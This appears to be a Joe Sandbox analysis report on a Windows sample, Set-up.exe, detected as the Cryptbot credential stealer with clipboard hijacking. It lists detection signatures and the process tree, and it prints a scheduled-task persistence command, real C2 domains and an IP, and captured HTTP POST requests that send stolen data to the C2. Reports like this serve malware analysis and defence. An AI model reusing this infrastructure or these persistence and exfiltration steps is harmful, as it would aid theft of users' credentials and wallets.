Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:	Set-up.exe
Analysis ID:	1525762
MD5:	aa8809ce5384175be7c0efb2604787f6
SHA1:	4cfdea7c7b47f16e767901d733be97a6635fd455
SHA256:	78e8980aa18bea446cd21ba2c19fa7a3f79fafb3d713e03376d691900bf9d24e
Tags:	exeuser-aachum
Infos:

Detection

Clipboard Hijacker, Cryptbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Clipboard Hijacker

Yara detected Cryptbot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops large PE files

Found evasive API chain (may stop execution after checking mutex)

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Set-up.exe (PID: 6244 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: AA8809CE5384175BE7C0EFB2604787F6)

service123.exe (PID: 5608 cmdline: "C:\Users\user\AppData\Local\Temp\service123.exe" MD5: 49859361F2114985E390C5057AAADD9A)

schtasks.exe (PID: 2748 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

service123.exe (PID: 3512 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 49859361F2114985E390C5057AAADD9A)

service123.exe (PID: 6888 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 49859361F2114985E390C5057AAADD9A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["fiftvx15pt.top", "analforeverlovyu.top"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2825437842.000000000445D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: Set-up.exe PID: 6244	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: Set-up.exe PID: 6244	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Set-up.exe PID: 6244	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: service123.exe PID: 5608	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.service123.exe.6c760000.1.unpack	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 6244, ParentProcessName: Set-up.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 2748, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Suricata Signatures

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-04T14:44:43.997360+0200	2054350	1	A Network Trojan was detected	192.168.2.6	49747	185.244.181.140	80	TCP
2024-10-04T14:44:47.562446+0200	2054350	1	A Network Trojan was detected	192.168.2.6	49775	185.244.181.140	80	TCP
2024-10-04T14:44:52.482026+0200	2054350	1	A Network Trojan was detected	192.168.2.6	49802	185.244.181.140	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: Set-up.exe.6244.0.memstrmin

Malware Configuration Extractor: Cryptbot {"C2 list": ["fiftvx15pt.top", "analforeverlovyu.top"]}

Multi AV Scanner detection for submitted file

Source: Set-up.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_001E15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		4_2_001E15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7614B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		4_2_6C7614B0

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea ecx, dword ptr [esp+04h]	4_2_001E81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C7DAC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C7DAD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C7DAD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	4_2_6C802EF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C77AF80
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C83F960h	4_2_6C77E8C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, ecx	4_2_6C8004E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C7804F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C78E490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C78E490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C780610
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C78A720
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C78A790
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C78A790
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C780010
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [6C83D014h]	4_2_6C834110
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C784203
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C78C2C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	4_2_6C808250
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C78A330
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C78A3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C78A3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C7DBDF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C7DBF50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+04h]	4_2_6C7B9F90
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C7B9910
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C819900
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C79B98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C79B987
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C7DBAC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C7D7AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C83DFF4h	4_2_6C7D3440
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+0Ch]	4_2_6C78D424
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	4_2_6C7D35F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+08h]	4_2_6C78D5A4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+04h]	4_2_6C78D724
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C78D050
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	4_2_6C7F7100
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C78D2B4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C7DB280
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_6C7D93B0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49747 -> 185.244.181.140:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49775 -> 185.244.181.140:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49802 -> 185.244.181.140:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: fiftvx15pt.top
Source: Malware configuration extractor	URLs: analforeverlovyu.top

Source: Joe Sandbox View

IP Address: 185.244.181.140 185.244.181.140

Source: Joe Sandbox View

ASN Name: BELCLOUDBG BELCLOUDBG

Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary46584377User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: fiftvx15pt.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary38382003User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 91197Host: fiftvx15pt.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary27285830User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 30096Host: fiftvx15pt.top

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: fiftvx15pt.top

Source: unknown

HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary46584377User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: fiftvx15pt.top

Source: Set-up.exe, 00000000.00000003.2336556663.0000000001768000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2336684023.000000000176A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fiftvx15pt.top/v1/u/
Source: Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: HwYuaUvXqdEkCixuJard.dll.0.dr	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: Set-up.exe	String found in binary or memory: https://serviceupdate32.com/update
Source: Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_6C779B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber,

4_2_6C779B99

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_6C779BD7 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

4_2_6C779BD7

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\Set-up.exe

File dump: service123.exe.0.dr 314617856

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_001E51B0	4_2_001E51B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_001E3E20	4_2_001E3E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C76CD00	4_2_6C76CD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C824E80	4_2_6C824E80
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C76EE50	4_2_6C76EE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C770FC0	4_2_6C770FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7B0870	4_2_6C7B0870
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7A2A7E	4_2_6C7A2A7E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7744F0	4_2_6C7744F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7A4490	4_2_6C7A4490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C798570	4_2_6C798570
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7A0580	4_2_6C7A0580
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C792110	4_2_6C792110
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7A1E40	4_2_6C7A1E40
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7AFE10	4_2_6C7AFE10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C775880	4_2_6C775880
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7AD99E	4_2_6C7AD99E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7BDA20	4_2_6C7BDA20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C78F510	4_2_6C78F510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7996A0	4_2_6C7996A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7A77D0	4_2_6C7A77D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C763000	4_2_6C763000
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7770C0	4_2_6C7770C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7A11BE	4_2_6C7A11BE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7B12C0	4_2_6C7B12C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7AF3C0	4_2_6C7AF3C0

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C835980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C8338D0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C833310 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C835A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C82AB60 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C833490 appears 45 times

Source: Set-up.exe, 00000000.00000002.2843692223.0000000001775000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameschtasks.exej% vs Set-up.exe

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/2@2/1

Source: C:\Users\user\Desktop\Set-up.exe

File created: C:\Users\user\AppData\Local\YfymcGAlvL

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Mutant created: \Sessions\1\BaseNamedObjects\quJYrdQFgygDuzOLcwxa
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4560:120:WilError_03

Source: C:\Users\user\Desktop\Set-up.exe

File created: C:\Users\user\AppData\Local\Temp\service123.exe

Jump to behavior

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Set-up.exe, 00000000.00000003.2378388009.000000000393E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Set-up.exe

ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: hwyuauvxqdekcixujard.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
